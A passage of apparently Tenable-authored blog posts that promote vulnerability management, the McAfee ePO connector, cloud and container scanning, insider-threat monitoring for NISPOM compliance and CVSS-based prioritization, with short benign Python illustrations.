    This gap is more than a simple lack of physical cybersecurity personnel at data centers and facilities. It extends to a cultural need for vendors within the oil and gas supply chain to treat cybersecurity as HSE. Attackers can simply attack a comparatively weaker link within the supply chain in order to gain a foothold in the larger organization.
    A heightened attention in this area would help update outdated and aging control systems in facilities and provide a view of data that extends beyond the corporate network and into critical vendor networks.

Enterprise vulnerability management

Adding urgency to the need to instill EVM within oil and gas companies are the new technologies on the horizon that will impact this sector in the coming years. Most of these technologies focus on producing cost-effective operational synergies and moving operations to a more digital framework. In short, the data will only grow in size, creating an even larger footprint for attack.

More data means more vulnerabilities. It therefore becomes pivotal for oil and gas networks to have a solution like Tenable SecurityCenter Continuous View® (SecurityCenter CV™), which consolidates and evaluates all vulnerability data across an organization and, if properly configured, the entire supply chain.

By prioritizing security risks and providing a clear view of an organization’s security posture, SecurityCenter CV can boost cybersecurity efforts. SecurityCenter CV also offers pre-built, highly customizable dashboards and reports to help oil and gas organizations quantify the effectiveness of their security program. For example, the Qualitative Risk Analysis dashboard can provide a detailed view of an organization’s security posture with CVSS as a base line for analysis.
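Using CVSS as a baseline means, at its simplest, mapping raw scores into qualitative severity bands. The sketch below uses the standard CVSS v2 ranges; the actual logic behind the Qualitative Risk Analysis dashboard is Tenable's own.

```python
# Illustrative CVSS v2 severity bucketing, similar in spirit to the
# baseline a qualitative risk analysis view might use.

def cvss_severity(score):
    """Map a CVSS v2 base score onto the standard severity bands."""
    if not 0.0 <= score <= 10.0:
        raise ValueError("CVSS scores range from 0.0 to 10.0")
    if score < 4.0:
        return "Low"
    if score < 7.0:
        return "Medium"
    return "High"

findings = [2.1, 5.0, 9.3, 7.5]
summary = {}
for s in findings:
    sev = cvss_severity(s)
    summary[sev] = summary.get(sev, 0) + 1
print(summary)  # {'Low': 1, 'Medium': 1, 'High': 2}
```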

To learn more about how SecurityCenter CV can help better protect your organization, please visit Tenable Network Security.

Ghosts of InfoSec


As National Cybersecurity Awareness Month draws to a close on Halloween, it is a fitting time to reflect on some of the ghosts of infosec.

Friendly and unfriendly ghosts

The ghosts of infosec include both friendly and unfriendly spirits. The friendly ones remind us of the lessons learned and the knowledge we've gained through the decades of our young industry; they also inspire us to look forward and to build on their work. Sadly, we do have quite a few unfriendly ghosts to contend with, from those which are merely troubling to some which are truly terrifying.

Willis Ware understood the significance of computers long before most, saying in 1966:

“The computer will touch men everywhere and in every way, almost on a minute-to-minute basis. Every man will communicate through a computer whatever he does. It will change and reshape his life, modify his career and force him to accept a life of continuous change.”

Decades before it became a popular concern, Ware predicted that increased reliance on computers would present serious privacy issues. He led several committees aimed at safeguarding computer user privacy rights, including the Privacy Protection Commission created by President Ford, which led to the creation of the Federal Privacy Act of 1974.

I won’t dwell on the most terrifying ghosts; the media does a good job of scaring us all with the latest cybersecurity nightmares, from insecure medical devices to default credentials on IoT systems. Those of us in the industry have a wide array of our own hauntings depending on our experiences, from pervasive web application vulnerabilities such as SQL injection to unvalidated inputs to unpatched software and flawed crypto.

Oldies but goodies

There are two reports from the sixties and seventies which I still find valuable, and they also provide good resources for exploring both ends of our ghost spectrum.

The first is the Ware Report (officially titled Security Controls for Computer Systems), a foundational text that established an understanding of computer security issues still relevant today, despite its age and the rapid evolution of computer technology. The Ware report gave us insights including:

…certainly security control will be cheapest if it is considered in the system architecture prior to hardware and software design.

and

User convenience is an important aspect of achieving security control because it determines whether or not users tend to find ways to get around, ignore, or subvert controls.

The Ware report also gave us this graphic, which identifies key vulnerabilities:

Figure 3 from the Ware Report

Figure 3, from Security Controls for Computer Systems

As dated as this is, with a few changed labels, this graphic is almost as accurate today as it was nearly 50 years ago when first published; the critical leakage points are still valid.

Bob Abbott’s many contributions to computing and security include authoring the first set of Privacy and Data Confidentiality policies for the Health Care area (1974) and the development of the first multi-user, multi-tasking operating system for Cray class supercomputers to go into 24X7 operational deployment. He also led a project that produced the first physiological monitoring system for patients recovering from open-heart surgery. Abbott may be best remembered by some as an advisor to the movie Sneakers. The James Earl Jones character in the movie was named Bernard Abbott in a nod to him, and many characters were modeled after members of Bob’s team.

The Ware Report is inspirational; it reminds us of the people who have come before us, and the work they have done; it truly provides a group of “friendly infosec ghosts” who paved the way into the cybersecurity industry. Unfortunately, rereading the report also reminds us of how long we have struggled with some of the fundamental issues of securing information and how much work we still need to do before they will stop haunting us.

Rereading the report also reminds us of how long we have struggled with some of the fundamental issues of securing information

Another early report I find informative is Security Analysis and Enhancements of Computer Operating Systems (authored by Bob Abbott and others), part of the RISOS (Research in Secured Operating Systems) project. Although this report has not aged as well as the Ware Report, it is still informative. This report outlined seven key operating system security flaws covering issues including parameter validation, logic flaws, identification/authentication/authorization failures, and more that any modern student of software security would recognize. As before, this shows us both good work that we can continue to build upon and ghosts we have yet to exorcise. In spite of being another reminder of flaws we have yet to resolve, it is good to consider that as an industry we have made great strides in driving some of these ghosts out of our operating systems – unfortunately many have moved to the application layer and continue to haunt us there.

Moving forward

Admiral Grace Hopper was a computer pioneer whose career spanned decades, from the early days of programming with patch cables and later with DIP switches to her invention of the first programming language compiler. One of Adm. Hopper’s most notable contributions to the field is the term “debugging,” which comes from her solving a computing “bug” by removing a moth from an electromechanical relay in a computer system. Her importance to computing in the US Navy was so great that the first two times she retired, the Navy brought her back – she finally retired as a Rear Admiral in 1986.

As we close the door on another National Cybersecurity Awareness Month, we must remember how far we have come, and how far we have yet to go. As bad as some of the poltergeists are, let’s try to focus on the friendly ghosts that remind us of how far we have come – from pioneers such as Admiral Grace Hopper, Willis Ware, Bob Abbott, and many more; and the foundational work they did.

We must remember how far we have come, and how far we have yet to go

Isaac Newton is often credited with the saying “If I have seen further it is by standing on the shoulders of giants.” All of us working to improve the state of cybersecurity stand on the shoulders of many giants; remember those ghosts and maybe we can all get a good night’s sleep on this All Cybers’ Eve.


Modernizing Government Technology


Recently Jack Huffard guest blogged for The Northern Virginia Technology Council (NVTC), the largest technology council in the United States. In Modernizing Government Technology, Jack discusses the Modernizing Government Technology Act of 2016, which addresses the need to replace legacy IT in the federal government.

“If it works, don’t fix it” no longer applies; legacy systems can harbor security weaknesses and vulnerabilities that can cripple an agency. The MGT Act would help agencies fund projects to replace outdated systems, to transition to the cloud, or to enhance information security technologies. Jack explains how the IT modernization funds would work in this informative blog.

Read the full article

Jack will also be participating in the Collaborating for Cyber Success Panel at NVTC’s Capital Cybersecurity Summit on November 2-3, 2016 at the Ritz-Carlton Tysons Corner in McLean, VA.

Tenable SecurityCenter and McAfee ePolicy Orchestrator Integration


McAfee ePolicy Orchestrator (ePO) is security management software for enterprise systems, providing agent-based accounting of managed networked assets. With automated policy management, you can centrally control the security processes of your organization and make faster, fact-based decisions to ensure the optimal protection of your critical assets and data. Currently, endpoint protection platforms like McAfee ePO lack vulnerability context (MVM was discontinued in January 2016). However, by having access to vulnerability data, McAfee ePO customers can achieve the following benefits:

  • Accurate and complete inventory of vulnerable assets, devices and systems
  • Visibility and confidence in your organization’s security posture
  • Data-based context for effective decision-making on action and remediation

How Tenable can help

With our recently released Tenable Connector for ePO, SecurityCenter® customers are now able to import market-leading vulnerability data into McAfee ePO. This rich and comprehensive vulnerability data includes security threats for managed hosts and rogue devices that SecurityCenter detects on a network. As a result, McAfee ePO customers now have critical visibility and context on systems, assets and data needed for an effective security program.

Connecting the two systems is easy. First, download the connector. Then follow the instructions below.

Installing the Tenable Connector for ePO

  1. Log on to McAfee ePO. From the drop-down Menu, click Extensions.

Installation Extensions

  2. Click Install Extension at the top of the page.
  3. Click Choose File.
  4. Select the file that you have downloaded from the portal and Open it.
  5. Click OK.
  6. Review the information to be sure that it is the correct extension and click OK.

Review extension information

  7. From the extension tree on the left, find the Tenable Security Connector under Third Party. Verify that everything was installed correctly by clicking on it. The connector will display a Running status.

Connector is running

Configuring the registered server

  1. Log on to ePO. From the Menu, click Registered Servers.

Registered Servers

  2. Click New Server at the top of the page.
  3. Give the SecurityCenter server a meaningful name, and click Next.
  4. Enter the configuration for your SecurityCenter installation: IP Address, Port Number, User Name and Password.

Enter configuration data

  5. Click the Test Connection button. This will check the credentials to make sure everything works. Click Save.
  6. The new server will be listed in the Registered Servers list with the name from step 3.

List of Registered Servers

Configuring the connector

  1. Log on to ePO. From the Menu, click Server Tasks.

Server Tasks

  2. In the Quick find search box, enter Tenable and click Apply.
  3. You should see a Tenable SecurityCenter Collect Task. Click Edit.

Tenable SecurityCenter Collect Task

  4. Change the schedule status to Enabled, and click Next.
  5. From the drop-down list, select the Registered Server you created previously.
  6. Select the schedule that works best for your environment to collect data from SecurityCenter. NOTE: You should only have one task configured at any given time; during the import process, all old data is purged. Click Next.

Schedule

  7. You should now see a summary of your configuration. If everything looks correct, click Save.

Configuration summary

Running the connector

At this point, the connector will run on your configured schedule. Alternatively, follow these steps to run the connector on-demand:

  1. Click Run in the Server Tasks list.

Run/Server Tasks

  2. This will pull the Server Task Log for the extension and display the current status of the import. Any errors or status updates will be in this log. The time to display the log depends on the amount of vulnerability data in SecurityCenter for the specified time frame.

Server Task Log status

Viewing the data from the connector

Tenable provides an ePO Dashboard with some basic charts and graphs of the imported data:

Tenable ePO Dashboard

The data can also be viewed on each host by using the system tree:

System Tree data view

With the Tenable-built, McAfee-certified connector, SecurityCenter data is automatically sent to the McAfee ePO console. Having this rich vulnerability assessment data enables ePO security professionals to make better informed decisions about action and remediation in their environment. The integration also enables McAfee ePO customers to maintain a complete and accurate inventory of all systems, whether managed by ePO or not.
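Conceptually, each collect run behaves like the sketch below: purge the previous snapshot (as noted in the scheduling step above), import the fresh vulnerability records, and summarize them per host for display in the system tree. All field names here are invented for illustration; the real connector and the SecurityCenter API differ.

```python
# Hypothetical model of a collect task's import-and-summarize cycle.

def import_snapshot(store, records):
    """Purge the previous import, then load the new one keyed by host IP."""
    store.clear()
    for rec in records:
        store.setdefault(rec["ip"], []).append(rec)
    return store

def host_summary(store):
    """Per-host rollup of the kind a management console might display."""
    return {ip: {"findings": len(recs),
                 "worst": max(r["severity"] for r in recs)}
            for ip, recs in store.items()}

store = {}
records = [
    {"ip": "10.0.0.5", "plugin": "19506", "severity": 1},
    {"ip": "10.0.0.5", "plugin": "33850", "severity": 3},
    {"ip": "10.0.0.9", "plugin": "10180", "severity": 0},
]
import_snapshot(store, records)
print(host_summary(store))
# {'10.0.0.5': {'findings': 2, 'worst': 3}, '10.0.0.9': {'findings': 1, 'worst': 0}}
```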

For more information

See the McAfee Integration page for more information.

Securing an Expanding Cloud Infrastructure


Although cloud infrastructure is being implemented by many organizations, there still seems to be a degree of skepticism regarding its security. According to a survey conducted by SANS, 40% of organizations surveyed said unauthorized access to sensitive data from other tenants was the most pressing concern with public cloud deployments. Another 33% said they do not currently have enough visibility into their public cloud providers' operations. Do you share similar concerns? How can you address them, or at the very least mitigate them?

When we take into account how quickly an organization can set up various systems in a cloud infrastructure, the security of these systems must be brought to the forefront of discussion. Having the flexibility to quickly deploy, tear down, and redeploy systems is great, but how are you going to secure them?

Tenable solutions

Tenable delivers a comprehensive cloud security solution based on continuous network monitoring. This is accomplished by leveraging several of Tenable’s network sensors: active scanning, intelligent connectors, host data, and agent scans. Implementing these sensors in a cloud deployment delivers multiple data points to ensure continued security as your organization continues to grow.

Active scanning

Procedures and processes can get very convoluted when cloud infrastructures are implemented. It's another environment for which you must monitor credentials, system access, and privileges. With Nessus® Manager and Nessus Cloud, you can run audit and vulnerability scans on demand, or in pre-scheduled intervals to assess your systems in the cloud.

Intelligent connectors

While there are multiple vendors offering cloud solutions, Tenable has taken the extra step in providing seamless integration with some of the most widely used cloud providers. Nessus Manager and Nessus Cloud enable organizations to have access to unique templates created for several major cloud providers. Whether you have chosen to go with Amazon Web Services (AWS), Microsoft Azure, or Rackspace, Tenable has you covered with an easy-to-use security platform that integrates with these popular cloud services.

Nessus Cloud is now pre-authorized to scan Amazon Web Services (AWS) environments. Any customer with a Nessus Cloud license can launch a scanner into their AWS environment from the AWS Marketplace, point it at the targets they'd like to scan, and then view and manage the scan results in Nessus Cloud. Proper setup of the AWS scanner can be found in the How-To Guide.

Host data

As stated in the SANS survey, 40% of organizations said unauthorized access to sensitive data by other cloud tenants was the most concerning topic regarding cloud deployments. Tenable SecurityCenter Continuous View® (SecurityCenter CV™) is equipped with host data analysis capabilities to review many event types, such as stopped/running databases, admin and non-admin user events, and system configuration reviews. By leveraging host data such as that gathered by Tenable Log Correlation Engine®, SecurityCenter CV provides the insight you need to detect if there are any unauthorized actions happening in your cloud deployment.

Addressing the issue of securing new infrastructure, Tenable also gathers host configuration information. You can use this data to ensure that your cloud-based systems are configured to meet the security standards followed by your organization.
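As a rough illustration, checking collected host configurations against an organizational baseline amounts to a comparison like the one below; the setting names and baseline values are invented for the example.

```python
# Hypothetical drift check between a collected host configuration and
# an organizational security baseline.

BASELINE = {
    "ssh_root_login": "no",
    "password_min_length": 12,
    "audit_logging": "enabled",
}

def config_drift(collected):
    """Return the settings that deviate from the baseline."""
    return {k: {"expected": v, "actual": collected.get(k)}
            for k, v in BASELINE.items()
            if collected.get(k) != v}

host = {"ssh_root_login": "yes", "password_min_length": 12,
        "audit_logging": "enabled"}
print(config_drift(host))
# {'ssh_root_login': {'expected': 'no', 'actual': 'yes'}}
```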

Agent scanning

One of the more difficult challenges facing organizations utilizing cloud infrastructure is continuous security. Using a cloud environment may increase an organization’s attack surface and inherently increase risk. By utilizing Nessus Cloud and Nessus Manager, you can better mitigate risk with their ability to perform agent scanning. Agents can be installed on cloud systems locally to collect vulnerability, compliance, and system data. By leveraging agent scans, your organization has yet another option for monitoring and securing your cloud environments. It's great having access to scan data that informs you of a cloud environment’s security posture at that time, but what about when you’re not actively running scans? You can install agents on your cloud hosts to report back vulnerabilities, compliance results, and system configurations and alert your team to unauthorized events and other items of concern.

Conclusion

Cloud infrastructure continues to be an incredible technology for expanding and adjusting your environment with unprecedented flexibility. However, there must be additional attention to security during implementation to ensure continued security during growth. With Tenable solutions, you can continue to expand at record rates while ensuring due diligence is applied to your cloud environment’s security.

Government and Industry Collaboration: The Long Path to Trust and Sharing


Agencies are stepping up to the plate and contributing active intelligence to threat sharing programs, a big step on the long and challenging path to effective cybersecurity information sharing.

Both government and industry have recognized for years that cooperation is necessary to defend against increasingly sophisticated, organized and well-resourced cyber adversaries. Sharing of threat information has been hampered by a lack of trust, however. Companies often are reluctant to share with competitors and even with partners. And everyone has been reluctant to share with government, which has been hesitant to share with the private sector.

Effective information sharing is beginning to occur

But cracks finally are appearing in these walls and effective information sharing is beginning to occur. Government agencies are taking a more active part in sharing programs, and technical standards for sharing across broader communities of interest are being developed.

Overcoming the fear of Big Brother

The role of government in sharing security information has been problematic. The federal government operates large IT enterprises and is charged with defending the nation’s critical infrastructure, making it both a prime source and consumer of threat intelligence. But concerns about liability, privacy and competition have made companies reluctant to provide information to government. Agencies, in turn, have been unwilling to share their own sensitive information.

This has resulted in barriers to getting information into the hands of those who need it. Ron Gula, in an opinion piece for the Christian Science Monitor’s Passcode published in October 2015, advocated greater government transparency in its cybersecurity efforts, saying that “security through obscurity” is not an effective policy.

The Homeland Security Department’s Automated Indicator Sharing (AIS) program has recently emerged as an enabler for sharing. AIS is a voluntary hub for exchanging information among public and private sector organizations. It began receiving and disseminating threat indicators in March, and according to reports, some 40 companies and 10 agencies have signed on with AIS.

The government’s willingness to give as well as receive goes a long way toward building trust

Interestingly, the agencies are supplying most of the information and companies primarily are consumers. This demonstration of the government’s willingness to give as well as receive goes a long way toward building trust.

Building on standards

Sharing works best in formal programs with trusted partners and established policies and practices. Toward this end, technical standards and best practices are being developed by both government and industry.

Sharing works best in formal programs with trusted partners and established policies and practices

One of the challenges of sharing cybersecurity intelligence is that it is likely to contain sensitive information that can reveal things about the source of the intelligence, resulting in risks to confidentiality, privacy and liability. To help limit these risks, the National Institute of Standards and Technology has released Special Publication 800-150, a Guide to Cyber Threat Information Sharing.

“By exchanging cyber threat information within a sharing community, organizations can leverage the collective knowledge, experience, and capabilities to gain a more complete understanding of the threats the organization may face,” the authors write. They provide a list of recommendations for establishing information-sharing programs, relationships and capabilities.

As NIST points out, info sharing works best within communities, and industry-specific Information Sharing and Analysis Centers (ISACs) have been operating since 1999. There now are more than 20 ISACs sharing information. The administration now has broadened the criteria defining an info-sharing community beyond industry sectors under a 2015 executive order. According to DHS, new Information Sharing and Analysis Organizations (ISAOs) will accommodate groups that do not fit neatly into the sector-based ISAC structure.

“ISAOs may allow organizations to robustly participate in DHS information sharing programs even if they do not fit into an existing critical infrastructure sector, seek to collaborate with other companies in different ways (regionally, for example), or lack sufficient resources to share directly with the government,” DHS said.

A new ISAO Standards Organization has published the first set of voluntary standards for setting up private-sector ISAOs.

Taking part

Continuing the progress on the path to information sharing requires participation. Contributing and using cybersecurity information not only can help improve your agency’s cybersecurity posture, but helps create a more secure cyber ecosystem. To learn more about the best practices and standards for information sharing, you can read the publications from NIST and the ISAO Standards Organization.

To participate, check the resources at the DHS Automated Indicator Sharing program or the National Council of ISACs. A series of public meetings and workshops are being held to kick off the new ISAOs. Learn more about them at DHS or the ISAO Standards Organization.

While much work remains, the cybersecurity balance seems to be tipping away from self-interest to cooperation and that’s a good thing. After all, we’re all in this together.

Time Crunch: Federal Contractors Scramble to Clear NISPOM Change 2


Upon winning a government contract, many corporate executives breathe a sigh of relief. But these sighs may now be replaced by moans of frustration upon realizing what it takes to remain compliant with federal cybersecurity standards.

The National Industrial Security Program Operating Manual (NISPOM) is a perfect example of tightening cybersecurity requirements for federal contractors, especially in the defense sector. Thousands of companies now are scrambling to meet the November 17 deadline to become compliant with the requirements of NISPOM Change 2, which targets insider threats in contractors’ organizations.

In light of insiders such as Edward Snowden and most recently Harold Thomas Martin III, who was arrested in August for taking classified NSA information home, the Department of Defense has increased efforts to regulate the need for insider threat detection programs for organizations contracting with the federal government.

NISPOM is the definitive guide for all U.S. government contractors who deal with classified information and need to understand the requirements their insider threat detection programs must meet in order to continue working with the federal government. NISPOM is administered by the Defense Department’s Defense Security Service (DSS) and NISPOM requirements are mandatory.

Change 2, which was approved in May, gave all contractors working with 31 government agencies with national security roles (as well as the DOD) six months to establish insider threat programs. Agencies covered are:

  • Department of Agriculture
  • Department of Commerce
  • Department of Education
  • Department of Health and Human Services
  • Department of Homeland Security
  • Department of Housing and Urban Development
  • Department of Justice
  • Department of Labor
  • Department of State
  • Department of the Interior
  • Department of the Treasury
  • Department of Transportation
  • Environmental Protection Agency
  • Executive Office of the President
  • Federal Communications Commission
  • Federal Reserve System
  • General Services Administration
  • Government Accountability Office
  • Millennium Challenge Corporation
  • National Aeronautics and Space Administration
  • National Archives and Records Administration
  • National Science Foundation
  • Nuclear Regulatory Commission
  • Office of Personnel Management
  • Overseas Private Investment Corporation
  • Small Business Administration
  • Social Security Administration
  • United States Agency for International Development
  • United States International Trade Commission
  • United States Postal Service
  • United States Trade Representative

Passing NISPOM

Contracting companies must create an effective insider threat detection program that meets the requirements of Executive Order 13587 in order to receive a Facility Security Clearance (FCL) under NISPOM. Change 2 outlines three main steps contractors must take to receive an FCL:

1: Build an Insider Threat Detection Program

Contractors must put together a program capable of aggregating and analyzing cybersecurity data to extract actionable intelligence on potential insider threats. Contractors also must archive potential threats and routinely perform self-inspections, as well as report insider threat incidents to the government.

2: Name an Insider Threat Program Senior Official (ITPSO)

The ITPSO must be a U.S. citizen, a senior official in the company, and will be responsible for establishing and executing the insider threat program. This is crucial to meeting the requirements of NISPOM Change 2. Establishing a single point of contact and accountability is also a major requirement in several other cybersecurity regulations for organizations doing business in Europe, including Germany's IT Security Act (ITSG), which addresses the IT security of organizations that interact with German citizens and German companies.

3: Provide insider threat training

Training is a significant component of NISPOM Change 2. Training must cover such basic concepts as counterintelligence. Companies must also establish a process for responding to insider threat incidents.

Stronger with automation

The sand in the hourglass is running out for contracting companies that must meet the requirements of NISPOM Change 2. By working with Tenable Network Security solutions, organizations have access to the experience and tools necessary to build a state-of-the-art insider threat detection program and successfully navigate NISPOM Change 2.

The Insider Threat Dashboard and Report included in SecurityCenter Continuous View® (SecurityCenter CV™) empowers organizations to better understand the network activity of trusted sources and to identify suspicious and potentially malicious behavior. The report and dashboard help to monitor the activities of insiders—whether they are employees, contractors, or partners—the users who already have access to your organization's network and resources. The threat is that these insiders may either accidentally or intentionally do something to harm the network, compromise resources, or leak private data. Insider threats are different from external security threats in that they come from a "trusted” location within the network. Organizations trying to detect these threats face the challenge not only of differentiating attacks from "normal" traffic, but also of ensuring that security analysts and system administrators are not inundated with false positives from users performing legitimate tasks.

SecurityCenter CV also monitors and collects system data via the Log Correlation Engine® (LCE®). The information collected from passive and event-based sources assists security operations teams with monitoring users and their activities. Potential suspicious activity is noted, as well as the top users engaging in activity of interest. Login activity by user and users per host is also presented. In these latter two cases, potentially suspicious activity is noted on a per-user or per-host basis, to assist an analyst in connecting users to questionable activity and thus identifying insider threats.
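The per-user and per-host analysis described above boils down to simple aggregations over collected login events. Here is an illustrative Python sketch, not Tenable code; the event format and the flagging threshold are assumptions chosen for the example:

```python
from collections import Counter

def flag_noisy_users(login_events, threshold=100):
    """login_events: iterable of (user, host) tuples drawn from collected logs.
    Returns users whose login count exceeds the threshold, as candidates for
    closer review (high volume alone is not proof of malicious intent)."""
    per_user = Counter(user for user, _host in login_events)
    return sorted(u for u, count in per_user.items() if count > threshold)

def users_per_host(login_events):
    """Counts the distinct users seen logging in to each host."""
    seen = {}
    for user, host in login_events:
        seen.setdefault(host, set()).add(user)
    return {host: len(users) for host, users in seen.items()}
```

In practice an analyst would tune the threshold per environment and correlate flagged users with other activity of interest rather than acting on counts alone.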

An effective insider threat program that complies with NISPOM Change 2 requires that organizations know who and what is on their networks. Leveraging cutting-edge technologies can provide contractors with the visibility and understanding needed to protect their networks and to establish effective insider threat programs.

Containerization and Security


Containerization is not only an exciting foundation of DevOps; it is also an answer to several critical operational issues.

For developers, building software once, packaging it and running it anywhere regardless of library versions, dependencies, or underlying hardware and operating system has been a challenge.

For operations staff, setting up an environment that can run any new application consistently is reassuring, so that when the application goes into production, the system is reliable and can be trusted to run smoothly.

For production staff, implementing a new package easily is a huge time saver.

For all these professionals, containers are helping a dream become a reality.

What are containers?

Containers are lightweight, portable software packages with everything needed at runtime

While containers are a hot topic, they are not new. Docker is arguably the company that launched the current container market. But container technology has been with us for several years, principally in Linux as LXC. Containers are lightweight, portable software packages with everything needed at runtime: code, system tools, and libraries. While containers are similar to virtual machines (VMs), they are much smaller and more efficient. Along with the application itself, a VM includes the overhead of the entire guest operating system, binaries and libraries, and it requires a hypervisor for management on a server. A container is a much lighter-weight package (think of twenty megabytes instead of twenty gigabytes); it shares the operating system kernel via API calls with other containers on a host. Containers are a means of consistently moving and deploying applications into different environments, because a container includes the entire runtime environment needed for the application – libraries, dependencies, configuration files, etc. – eliminating the differences in OS distributions and guaranteeing that the software will always run the same, regardless of the environment.

The benefits of containers

Not only are containers small and efficient, but they are also highly dynamic. They can start up or shut down quickly. They can run for just hours or for days. They can be deleted and replaced.

Containers are increasingly being used for web services, such as Google Apps. Containers make it easy to develop web apps that are composed of hundreds of microservices, replacing a monolithic backend. Microservices accelerate development by separating functionality for efficiency and maintainability.

Containerization provides isolation for microservices from other processes, a lightweight deployment mechanism, a stateless package, and the ability to build and rebuild services on the fly. Containers contribute to easier and quicker application delivery, and faster and more reliable deployment. Hundreds of containers can be run on just one server, saving valuable data center budget. Docker containers can run on virtually any computer, infrastructure, or cloud. Container management is therefore much less painful for operators.

Container security

Infosec professionals generally consider containers less secure than VMs

But because containers are not isolated from one another to the same degree that virtual machines on a shared host are, and because containers are usually not scanned for vulnerabilities before or after being deployed to production, infosec professionals generally consider containers less secure than VMs. A vulnerability in a shared OS kernel can potentially provide a way into a container. Active scans can miss most containers because of their short lifespans. Containers also typically don't run the SSH daemon, so credentialed scans don't work with most containers. Microservices and containers can introduce hundreds of endpoints and erode the visibility of security risks.

Tenable has been addressing container security since early 2016, with Nessus offering the ability to detect running Docker hosts and the containers running on them. Nessus can also audit Docker hosts against the CIS Docker v1.6+ benchmark to help harden container hosts. Discovering and securing Docker hosts is an important first step, but it’s not enough. Without comprehensive, continuous monitoring, you may not be able to see and assess all container configurations and instances. A new kind of security solution is needed.

Tenable now offers a better approach to container security

Because containers are rebuilt on the fly and exist for short periods of time, organizations have struggled to continuously assess Docker containers and similar environments for vulnerabilities. Tenable now offers a better approach to container security – a solution that monitors container images for vulnerabilities during the development lifecycle, before deployment, to ensure containers are vulnerability-free in production.

The recent acquisition of FlawCheck, the leader in container security, enables Tenable to deliver innovative technology to organizations that want to integrate security into their build pipeline. This helps provide a real-time view of their CI/CD (continuous integration and continuous deployment) environments for vulnerability and malware detection in Docker container images.

FlawCheck in the DevOps pipeline
FlawCheck scans container images in the Test phase of the DevOps pipeline

FlawCheck scans container images for vulnerabilities and provides continuous monitoring early in the DevOps lifecycle. An application need not be running to be discovered and scanned; the container image for that app is stored and scanned, providing timely security assurance before an application or service is launched.

FlawCheck revolutionizes DevOps security

For organizations with large development teams, FlawCheck revolutionizes DevOps security, moving security into the development pipeline for real-time on-the-fly security auditing. Security is baked into containers before they are ever deployed onto networks.
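The "baked in before deployment" pattern described above amounts to a gate in the build pipeline: if an image scan reports serious findings, the build fails before the container ever reaches the network. A minimal, hypothetical sketch of such a gate; the finding fields and severity names here are assumptions for illustration, not the FlawCheck API:

```python
def image_passes_gate(findings, blocking_severities=("critical", "high")):
    """findings: list of dicts like {"id": ..., "severity": ..., "malware": bool}
    produced by an image scan. Returns True only if no blocking finding
    (malware, or a vulnerability at a blocking severity) is present."""
    for finding in findings:
        if finding.get("malware"):
            return False
        if finding.get("severity", "").lower() in blocking_severities:
            return False
    return True

# In a CI step, a gate miss would typically fail the build, e.g.:
#   if not image_passes_gate(scan_results): sys.exit(1)
```

The design choice is that the gate runs in the Test phase, so a vulnerable image is rejected long before deployment rather than discovered in production.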

For more information

Vulnerability Prioritization with Nessus Cloud


If you’re a security professional, vulnerability prioritization is likely something you deal with frequently. Few, if any organizations ever address 100% of discovered vulnerabilities, as new vulnerabilities come out every day and old vulnerabilities can hide out on unknown and shadow assets or simply never make it to the top of the patching priority list.

Vulnerabilities that don’t get addressed cause problems. In last year’s Data Breach Investigations Report (DBIR), Verizon noted that 99.9% of the exploited vulnerabilities were compromised more than a year after the CVE was published.

Addressing 100% of vulnerabilities 100% of the time is not an achievable goal for most organizations. But being able to prioritize those that pose the highest risk is something that most organizations should be able to accomplish using a solution like Nessus® Cloud. Here are a few tips for using Nessus Cloud to prioritize your vulnerabilities list.

Scoring vulnerabilities with CVSS

The industry standard for communicating the severity of vulnerabilities is the Common Vulnerability Scoring System, or CVSS. The CVSS uses an algorithm based on metrics in three different areas that approximate the ease and impact of exploiting a vulnerability. Our EMEA technical director, Gavin Millard, gives a good explanation of the three CVSS scoring areas (base, temporal, environmental) in this on-demand webcast if you’d like to learn more about CVSS.

Addressing 100% of vulnerabilities 100% of the time is not an achievable goal for most organizations

As an industry standard, Nessus Cloud uses CVSS in multiple ways. First, when Nessus Cloud identifies a vulnerability as Critical, High, Medium, Low or Informational, it uses CVSS scores to assign those categories:

Risk information

You can also use the Nessus Cloud Advanced Search capability to identify vulnerabilities with specific CVSS characteristics. For example, many organizations rely on CVSS Base Scores, the metrics that measure the intrinsic exploitability and impact of a vulnerability. In Advanced Search, it’s easy to identify vulnerabilities cataloged on your network that have a CVSS Base Score of 7.5 or higher. This search would list all of the High severity vulnerabilities:

Advanced Search by CVSS
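The severity categories and the base-score filter described above can be sketched in a few lines. The cut-offs below follow the common CVSSv2-style banding (Critical 10.0, High 7.0–9.9, Medium 4.0–6.9, Low 0.1–3.9, Informational 0); treat them as an illustration of the idea rather than the exact Nessus Cloud implementation:

```python
def severity(cvss_base):
    """Bucket a CVSSv2-style base score into a severity category."""
    if cvss_base == 0:
        return "Informational"
    if cvss_base < 4.0:
        return "Low"
    if cvss_base < 7.0:
        return "Medium"
    if cvss_base < 10.0:
        return "High"
    return "Critical"

def at_or_above(vulns, cutoff=7.5):
    """Mimic an Advanced Search filter: keep vulns with base score >= cutoff.
    vulns: list of dicts with a 'cvss_base' field (an assumed shape)."""
    return [v for v in vulns if v["cvss_base"] >= cutoff]
```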

Additional search filters

CVSS provides a number you can associate with each vulnerability, but Advanced Search offers a few other filters that add context and help you sift through the mountain of vulnerabilities.

Tenable announced several of these advanced search filters for Nessus Cloud last year. One of my favorites is the In the News filter. Your CISO may have just read about a big new vulnerability, such as Heartbleed, Shellshock, or Ghost, that has caught the attention of the media. The In the News filter can identify these high-profile vulnerabilities and help your security team address them first, so that when asked, you can confidently state that you have taken care of the big vulnerability that’s making headlines.

Advanced Search for vulnerabilities in the news

Identifying vulnerabilities on specific assets - or not

Earlier this year, Asset Lists and Exclusions were introduced in Nessus Cloud. Asset Lists are a way to organize hosts into groups. For example, hosts that fall under the same compliance area, such as PCI DSS, could be placed into one list. Asset Lists have several benefits. You can scan similar assets using the most appropriate scan policies and frequencies. Asset lists also make it easier to share vulnerability information with the appropriate business group, which can simplify the remediation process.

Assets Lists can also be useful if and when you need to scan specific assets at a specific time. For example, you might want to scan all your PCI assets immediately before an annual PCI audit.

On the other hand, Exclusions enable you to restrict the scanning of specific hosts based on a given schedule. If there is a situation where one or many hosts do not need to be included in a scan, you can omit them and simplify your vulnerability results.

Dashboards

While CVSS, Advanced Search Filters, Asset Lists, and Exclusions are all useful ways to prioritize vulnerabilities, sometimes you just need to see the big picture. To accomplish this, Nessus Cloud offers dashboards that provide a graphical representation of vulnerability trending data over time.

